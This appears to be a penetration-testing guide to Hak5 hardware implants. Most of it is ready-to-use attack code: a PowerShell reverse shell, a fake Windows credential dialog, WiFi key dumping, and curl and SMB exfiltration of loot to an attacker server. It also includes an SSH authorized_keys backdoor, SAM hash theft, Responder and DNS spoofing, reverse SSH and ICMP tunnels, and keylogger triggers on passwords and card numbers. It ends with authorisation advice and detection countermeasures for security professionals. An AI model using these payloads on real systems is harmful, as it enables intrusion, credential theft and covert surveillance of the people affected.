Hak5 Toolkit

Hak5 manufactures purpose-built hardware tools for authorized physical penetration testing, social engineering assessments, and red team operations. This guide covers the complete ecosystem, payload development, and operational workflows.

Overview

Hak5’s hardware platform targets USB, network, and wireless attack surfaces in controlled engagements. All tools require explicit authorization before deployment on target networks. The ecosystem integrates with Cloud C2 for centralized command & control, exfiltration management, and post-engagement analytics.

Device	Interface	Primary Attack	Range
Rubber Ducky	USB HID	Keystroke injection	Physical
Bash Bunny	USB	Multi-vector attacks	Physical
LAN Turtle	USB Ethernet	Network implant	Local network
Packet Squirrel	USB Ethernet	Inline network attacks	Network path
Key Croc	USB HID + WiFi	Keystroke logging	30m+ WiFi
O.MG Cable	Hidden HID	Covert attacks	WiFi-enabled

USB Rubber Ducky

The Rubber Ducky is a keystroke injection tool that emulates a USB keyboard to execute rapid pre-programmed commands on target systems. Target OS recognizes it as a trusted input device.

Key Characteristics:

• USB HID keyboard emulation
• DuckyScript 3.0 payload language
• Runs payloads from onboard storage
• No network connectivity (completely covert)
• Works across Windows, macOS, Linux

DuckyScript 3.0 Basics

REM Simple keystroke injection payload
DELAY 1000
STRING cmd.exe
ENTER
DELAY 500
STRING ipconfig /all
ENTER

Common Commands:

REM Delays
DELAY 500        REM Wait 500ms

REM Keystrokes
ENTER            REM Press Enter
TAB              REM Tab key
ESCAPE           REM Escape

REM Modifier combinations
CTRL-ALT-DELETE
WINDOWS-R        REM Run dialog

REM Type text
STRING whoami    REM Type literal text

REM Comments
REM This is ignored during execution

Windows Reverse Shell Payload

REM Windows reverse shell via PowerShell
DELAY 2000
WINDOWS-R
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
ENTER
DELAY 1500
STRING $client = New-Object System.Net.Sockets.TCPClient('10.0.0.5', 4444);
ENTER
DELAY 300
STRING $stream = $client.GetStream();
ENTER
DELAY 300
STRING [byte[]]$buf = 0..65535|%{0};
ENTER
DELAY 300
STRING $sw = New-Object System.IO.StreamWriter($stream);
ENTER
DELAY 300
STRING $host.UI.RawUI.WindowTitle = 'reverse';
ENTER
DELAY 300
STRING $sw.AutoFlush = $true;
ENTER
DELAY 300
STRING $sr = New-Object System.IO.StreamReader($stream);
ENTER
DELAY 1000

Credential Harvesting Payload

REM Prompt for credentials with fake login dialog
DELAY 2000
WINDOWS-R
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING [System.Reflection.Assembly]::LoadWithPartialName('System.windows.forms')
ENTER
DELAY 300
STRING $form = New-Object System.Windows.Forms.Form
ENTER
DELAY 300
STRING $form.Text = 'Windows Security'
ENTER
DELAY 300
STRING $form.Size = '300,200'
ENTER
DELAY 300
STRING $label = New-Object System.Windows.Forms.Label
ENTER
DELAY 300
STRING $label.Text = 'Password Expired. Enter credentials:'
ENTER

WiFi Exfiltration (via secondary tool)

REM Extract WiFi credentials post-exploitation
DELAY 1000
WINDOWS-R
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING netsh wlan show profile
ENTER
DELAY 500
STRING netsh wlan show profile * key=clear
ENTER
DELAY 500

Bash Bunny

The Bash Bunny is a multi-vector USB attack platform supporting DuckyScript, Bash scripting, and simultaneous USB personalities (storage, serial, ethernet, keyboard). Includes onboard processing for advanced payload logic.

Key Characteristics:

• USB multi-personality support (HID, storage, ethernet, serial)
• 16 payload switch positions (physical mode selector)
• Bash shell scripting on device
• Onboard Python & command-line tools
• LED status indicators for operational feedback

Bash Bunny Payload Structure

#!/bin/bash
# payload.sh - Bash Bunny attack payload

# Variables
TARGET_NETWORK="internal.corp"
EXFIL_SERVER="10.0.0.5"

# Initialization phase
function initialize() {
    # Change LED color (red = active, blue = exfil, green = success)
    led red
    echo "Payload starting..."
}

# Attack phase
function attack() {
    # Enable ethernet personality
    switch_to_ethernet
    
    # Configure network
    ifconfig eth0 10.0.0.100 netmask 255.255.255.0
    
    # Run reconnaissance
    nmap -p 445 -sV $TARGET_NETWORK
}

# Exfiltration phase
function exfiltrate() {
    # Send data to C2
    curl -X POST -d @loot.txt $EXFIL_SERVER/upload
    led blue
}

# Cleanup
function cleanup() {
    rm -f loot.txt
    led green
}

# Main execution
initialize
attack
exfiltrate
cleanup

QuickCreds Payload (Password Harvesting)

#!/bin/bash
# QuickCreds: Extract Windows cached credentials

TARGET="WINDOWS_BOX_IP"
LOOT_DIR="/root/loot"

# Create persistent RDP/SSH backdoor
function create_backdoor() {
    ssh-keyscan -t rsa $TARGET >> known_hosts
    sshpass -p "password" ssh root@$TARGET \
        'echo "backdoor_key" >> ~/.ssh/authorized_keys'
}

# Dump hashes via SMB share
function extract_hashes() {
    mount -t cifs //$TARGET/C\$ $LOOT_DIR -o user=admin,password=pass
    cp $LOOT_DIR/Windows/System32/config/SAM .
    umount $LOOT_DIR
}

create_backdoor
extract_hashes

BunnyTap Payload (SMB Capture)

#!/bin/bash
# BunnyTap: Capture SMB credentials in transit

# Enable MITM mode
ifconfig eth0 up
brctl addbr br0
brctl addif br0 eth0 wlan0

# Start Responder (SMB poisoning)
responder -I br0 -v -f

# Log captured hashes
tcpdump -i br0 -w smb_capture.pcap 'port 445 or port 139'

SMB Exfiltration Payload

#!/bin/bash
# Exfil data via anonymous SMB share to attacker server

TARGET_SHARE="10.0.0.5"
SOURCE_FILE="/root/data.txt"

# Mount attacker's SMB share
mount -t cifs //$TARGET_SHARE/exfil /mnt/share \
    -o user=anonymous,password=""

# Copy sensitive files
cp $SOURCE_FILE /mnt/share/

# Verify transfer
ls -la /mnt/share/

umount /mnt/share

LAN Turtle

The LAN Turtle is a covert network implant disguised as a USB-to-Ethernet adapter. Sits inline on target network, routes traffic through attacker’s infrastructure, and maintains persistent access via cellular or WiFi backhaul.

Key Characteristics:

• USB-powered network bridge
• Covert deployment (appears as USB adapter)
• Cellular/WiFi-based C2
• Persistent backdoor on network
• Automatic reconnection on network change

LAN Turtle Modules

Module	Function	Use Case
autossh	SSH reverse tunnel	Remote shell access
meterpreter	Metasploit payload	Full exploitation framework
DNS spoof	DNS response hijacking	Redirect traffic to attacker server
ptunnel	ICMP tunneling	Bypass firewall egress filters
netcat	TCP/UDP listener	Quick reverse shell

LAN Turtle Configuration

# SSH reverse tunnel to attacker server (10.0.0.5)
autossh -M 20000 -f -N \
    -R 2222:localhost:22 \
    -i /root/.ssh/turtle_key \
    attacker@10.0.0.5

# DNS spoofing payload
dnsspoof -i eth0 -f dns-targets.txt

# ptunnel ICMP tunnel (bypass egress filtering)
ptunnel -x password -p -l 8888 -da 10.0.0.5 -dp 22

DNS Spoofing Configuration

Create /root/dns-targets.txt:

windows.update.com 10.0.0.5
*.internal.local 10.0.0.5
mail.company.com 10.0.0.6

Then run:

dnsspoof -i eth0 -f /root/dns-targets.txt

Packet Squirrel

The Packet Squirrel is an inline network implant that sits between a wall jack and target computer/printer. Captures traffic, modifies packets in transit, and exfiltrates data to attacker infrastructure.

Key Characteristics:

• Inline network bridge (transparent)
• tcpdump traffic capture
• DNS/HTTP/HTTPS interception
• Payload switching via LED indicators
• Covert cabling (Ethernet cable passes through)

Packet Squirrel Payload Modes

# Mode 1: tcpdump capture
LED SETUP

# Start tcpdump on both interfaces
tcpdump -i eth0 -w /tmp/capture-eth0.pcap &
tcpdump -i eth1 -w /tmp/capture-eth1.pcap &

LED ATTACK
sleep 600
LED EXFIL

# No exfil on Packet Squirrel - manual recovery

DNS Spoofing Mode

#!/bin/bash
# Packet Squirrel DNS spoofing

LED SETUP

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# Start dnsspoof
dnsspoof -i eth0 -f /tmp/dns-targets.txt &
dnsspoof -i eth1 -f /tmp/dns-targets.txt &

LED ATTACK
sleep 3600

LED EXFIL
pkill dnsspoof

VPN Tunnel Mode

#!/bin/bash
# Tunnel all target traffic through attacker VPN

LED SETUP

# Configure iptables for transparent proxy
iptables -t nat -A PREROUTING -i eth0 -j REDIRECT --to-port 8888

# Start OpenVPN tunnel
openvpn --remote 10.0.0.5 --proto udp --port 1194 &

LED ATTACK

Key Croc

The Key Croc is a WiFi-enabled keystroke logger and injector with regex-based triggers. Captures keystrokes locally, logs them, and executes payloads based on matched patterns. Includes cloud exfiltration.

Key Characteristics:

• USB HID keystroke capture & injection
• WiFi connectivity (30m+ range)
• Regex pattern matching triggers
• Real-time keystroke logging
• Cloud C2 integration

Key Croc Configuration

# /etc/keycroc/config.conf

# Enable keystroke logging
log_keystrokes=true
log_file=/tmp/keylog.txt

# WiFi settings
wifi_ssid="KeyCroc-Admin"
wifi_password="SecurePass123"

# Cloud C2 server
c2_server="cloud.hak5.org"
c2_api_key="your_api_key_here"

# Regex triggers
trigger_password = "(?i)(password|passwd|pwd).*:" 
trigger_credit = "\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}"
trigger_api_key = "[a-zA-Z0-9]{32,}"

Regex-Based Payload Execution

# Trigger injection when "sudo" is detected
trigger_sudo = "^sudo"
on_trigger_sudo {
    DELAY 500
    ENTER
    STRING whoami
    ENTER
}

# Exfil on detected credit card
trigger_cc = "\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}"
on_trigger_cc {
    curl -X POST -d @keylog.txt https://c2.server/exfil
}

Cloud Exfiltration

#!/bin/bash
# Upload captured keystrokes to cloud C2

API_KEY="your_api_key_here"
C2_SERVER="https://cloud.hak5.org/api"

curl -X POST \
    -H "Authorization: Bearer $API_KEY" \
    -F "file=@keylog.txt" \
    "$C2_SERVER/devices/keycroc/upload"

O.MG Cable

The O.MG Cable is a hardware-implanted HID attack platform embedded within a standard USB charging/data cable. Appears completely legitimate but executes keystrokes or command execution payloads on connection.

Key Characteristics:

• Invisible hardware implant in standard cable
• WiFi-triggered payload execution
• Geofencing support (trigger based on location)
• Keylogging capability
• Requires physical installation (pre-engagement)

O.MG Cable Payload

REM O.MG Cable payload - executed via WiFi trigger
DELAY 3000
WINDOWS-R
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
ENTER
DELAY 1500
STRING $url='http://10.0.0.5:8080/beacon';
ENTER
DELAY 300
STRING $data=@{hostname=$env:computername; user=$env:username};
ENTER
DELAY 300
STRING Invoke-WebRequest -Uri $url -Method POST -Body $data
ENTER

WiFi-Triggered Execution

#!/bin/bash
# O.MG Cable WiFi trigger configuration

# Connect to specified SSID
nmcli dev wifi connect "TargetNetwork" password "WifiPass"

# Trigger payload on connection
curl http://192.168.4.1/api/trigger -X POST \
    -H "Content-Type: application/json" \
    -d '{"payload": "reverse_shell", "target": "10.0.0.5"}'

Geofencing Payload

#!/bin/bash
# Execute payload when within GPS range of target

# Check GPS coordinates (requires GPS module)
lat=$(curl http://192.168.4.1/api/location | jq .latitude)
lon=$(curl http://192.168.4.1/api/location | jq .longitude)

# Target office coordinates
TARGET_LAT=37.7749
TARGET_LON=-122.4194
RADIUS=100  # meters

# Calculate distance
distance=$(python3 -c "
import math
lat_diff = ($lat - $TARGET_LAT) * 111000  # meters per degree
lon_diff = ($lon - $TARGET_LON) * 111000 * 0.8
dist = math.sqrt(lat_diff**2 + lon_diff**2)
print(int(dist))
")

# Trigger if within range
if [ $distance -lt $RADIUS ]; then
    curl http://192.168.4.1/api/trigger -X POST -d '{"payload": "exfil"}'
fi

Cloud C2

Cloud C2 is Hak5’s centralized command & control platform for managing multiple devices, deploying payloads, and retrieving exfiltrated data. Provides dashboard, device provisioning, and loot management.

Key Features:

• Multi-device management
• Payload library & deployment
• Exfiltration data aggregation
• Real-time status monitoring
• API-based automation

Device Provisioning

#!/bin/bash
# Register device with Cloud C2

C2_API="https://api.cloud.hak5.org/v1"
DEVICE_TYPE="bash_bunny"
DEVICE_ID=$(uname -a | md5sum | cut -d' ' -f1)
API_KEY="your_api_key_here"

curl -X POST "$C2_API/devices/register" \
    -H "Authorization: Bearer $API_KEY" \
    -H "Content-Type: application/json" \
    -d "{
        \"device_id\": \"$DEVICE_ID\",
        \"device_type\": \"$DEVICE_TYPE\",
        \"hostname\": \"$(hostname)\",
        \"version\": \"2.7.0\"
    }"

Payload Deployment

#!/bin/bash
# Deploy payload to device via Cloud C2

DEVICE_ID="device-xyz123"
PAYLOAD_ID="payload-reverse-shell"

curl -X POST "https://api.cloud.hak5.org/v1/devices/$DEVICE_ID/deploy" \
    -H "Authorization: Bearer $API_KEY" \
    -H "Content-Type: application/json" \
    -d "{
        \"payload_id\": \"$PAYLOAD_ID\",
        \"priority\": \"high\",
        \"execute_now\": true
    }"

Loot Retrieval

#!/bin/bash
# Download exfiltrated data from Cloud C2

API_KEY="your_api_key_here"
OUTPUT_DIR="/tmp/loot"

# List available loot
curl -X GET "https://api.cloud.hak5.org/v1/loot" \
    -H "Authorization: Bearer $API_KEY" | jq .

# Download specific file
curl -X GET "https://api.cloud.hak5.org/v1/loot/keylog-2026-04-15.txt" \
    -H "Authorization: Bearer $API_KEY" \
    -o "$OUTPUT_DIR/keylog.txt"

Payload Development

DuckyScript 3.0 Syntax Reference

REM Command injection payload template

REM Initialization
DELAY 2000

REM Target Windows
WINDOWS-R
DELAY 500
STRING cmd /c
ENTER

REM Execute commands
STRING tasklist
ENTER
DELAY 1000

REM Extract data
STRING echo %USERNAME% > user.txt
ENTER

REM Exfiltration (requires secondary tool)
STRING powershell -Exec Bypass -NoP "
ENTER
STRING Get-ChildItem -Path 'C:\Users' -Include '*.docx','*.xlsx'
ENTER

Bash Bunny Payload Structure

#!/bin/bash
# Standard Bash Bunny payload structure

TARGET_IP="$1"
LOOT_DIR="/root/loot"
EXFIL_ENDPOINT="http://10.0.0.5:8888"

# LED status
led red

# Reconnaissance phase
function recon() {
    nmap -sV -p 22,445,3389 $TARGET_IP > $LOOT_DIR/recon.txt
    led yellow
}

# Exploitation phase
function exploit() {
    sshpass -p "password" ssh root@$TARGET_IP "id > /tmp/whoami.txt"
    led red
}

# Exfiltration phase
function exfil() {
    curl -X POST -F "file=@$LOOT_DIR/recon.txt" $EXFIL_ENDPOINT/upload
    curl -X POST -F "file=@/tmp/whoami.txt" $EXFIL_ENDPOINT/upload
    led blue
}

# Cleanup
function cleanup() {
    rm -rf $LOOT_DIR
    led green
}

main() {
    recon
    exploit
    exfil
    cleanup
}

main $@

Community Payload Repository

Hak5 maintains official payload repos:

# Clone Bash Bunny payloads
git clone https://github.com/hak5/bashbunny-payloads.git
cd bashbunny-payloads

# Clone Rubber Ducky payloads
git clone https://github.com/hak5/USB-Rubber-Ducky.git

# Clone LAN Turtle payloads
git clone https://github.com/hak5/lant-payloads.git

Physical Assessment Workflow

Pre-Engagement Phase

1. Authorization Review

   • Written approval from target organization
   • Scope definition (devices, locations, timeframe)
   • Incident response contact numbers
   • Rules of engagement

2. Reconnaissance

   • Physical security audit (entry points, cameras)
   • Wireless survey (WiFi SSIDs, signal strength)
   • Personnel observation (badge types, habits)
   • Facility layout mapping

Deployment Phase

#!/bin/bash
# Deployment checklist script

# 1. Verify device is configured
echo "Checking Bash Bunny configuration..."
ls -la /root/payloads/

# 2. Test payload execution locally
echo "Testing payload..."
bash /root/payloads/test_payload.sh

# 3. Verify exfil connectivity
echo "Testing exfil endpoint..."
curl -X POST http://10.0.0.5:8888/test -d "device=ready"

# 4. Set device to correct switch position
echo "Switch device to position 1 before deployment"

# 5. Start logging
echo "Deployment: $(date)" >> /tmp/deployment.log

Execution Phase

#!/bin/bash
# Monitor payload execution

# Watch logs
tail -f /tmp/payloads.log

# Check LED status
# Red = Active execution
# Blue = Exfiltration
# Green = Complete
# Yellow = Error

# Monitor network traffic (if inline)
tcpdump -i eth0 -n 'not icmp'

# Check for blocked ports
netstat -an | grep ESTABLISHED

Post-Engagement Phase

1. Data Collection

   • Retrieve all exfiltrated data from Cloud C2
   • Export device logs
   • Document timeline of events

2. Sanitization

   # Clear logs on device
   rm -rf /root/loot
   rm -f /tmp/payload.log
   
   # Reset to factory defaults
   # (varies by device type)

3. Reporting

   • Summarize findings
   • Document successful attack vectors
   • Recommend mitigations

Detection and Countermeasures

USB Port Controls

Control	Effectiveness	Cost
Disable USB ports	High	Low
USB port blockers	High	Low
Whitelist USB devices	Medium	Medium
USB packet inspection	Low	High

Hardware Detection

# Linux: Detect unknown USB devices
lsusb | grep -v "Manufacturer"

# Windows: List USB devices via PowerShell
Get-PnpDevice -Class USB

# Monitor for HID devices
cat /proc/bus/input/devices | grep -i "handlers"

Network Monitoring

# Detect suspicious ethernet adapters
ip link show

# Monitor ARP for spoofing
arp-scan -l

# Capture suspicious DNS queries
tcpdump -i eth0 -n 'udp port 53' | grep -v "IN\?"

# Detect ICMP tunneling
tcpdump -i eth0 'icmp' -v

Behavioral Detection

• Unexpected USB devices appearing
• Unknown USB keyboard/mouse drivers
• Processes spawning unusual reverse shells
• Network traffic to external IPs during off-hours
• Anomalous credential usage patterns

Troubleshooting

Device Not Recognized

# Check USB connection
lsusb

# Check device logs
cat /root/logs/device.log

# Reset via button hold (device-specific)
# Bash Bunny: Hold button for 7 seconds
# Rubber Ducky: Power cycle

# Update firmware
# Download latest from hak5.org

Payload Execution Failures

• DELAY too short — Increase delay timings between commands
• Keyboard layout mismatch — Configure correct locale in settings
• USB power insufficient — Use powered USB hub
• Permissions denied — Run with admin/sudo privileges

Exfiltration Issues

# Test connectivity to C2
ping 10.0.0.5

# Verify API key
curl -H "Authorization: Bearer $API_KEY" \
    https://api.cloud.hak5.org/v1/devices

# Check firewall rules
ufw status
iptables -L -n

Cloud C2 Connection Problems

• Verify device has internet connectivity
• Check API key expiration
• Validate DNS resolution
• Test against alternate C2 endpoint

Best Practices

1. Always Obtain Written Authorization — Document scope & ROE before deployment
2. Test Payloads in Lab — Verify all payloads locally before field deployment
3. Use Cloud C2 for Tracking — Maintain audit trail of all deployments
4. Isolate Test Networks — Never test on production systems
5. Sanitize Devices Post-Assessment — Wipe all logs & exfiltrated data
6. Vary Tactics & Techniques — Don’t repeat same payloads in successive assessments
7. Document Everything — Capture exact commands, timestamps, and results
8. Have Incident Response Ready — Coordinate with target’s IR team
9. Secure Exfiltrated Data — Use encryption for data in transit and at rest
10. Train Team on OPSEC — Physical devices can be recovered; treat as compromised

Related Tools

Tool	Purpose	Overlap
Flipper Zero	Multi-protocol hacking device (NFC, RFID, BLE)	Complementary
Proxmark3	RFID/NFC cloning & analysis	Complementary
WiFi Pineapple	Rogue AP & MITM attacks	Complementary
Pwnagotchi	Automated WiFi handshake capture	Complementary
Metasploit	Post-exploitation framework	Used with payloads
Burp Suite	Web app penetration testing	Network-based attacks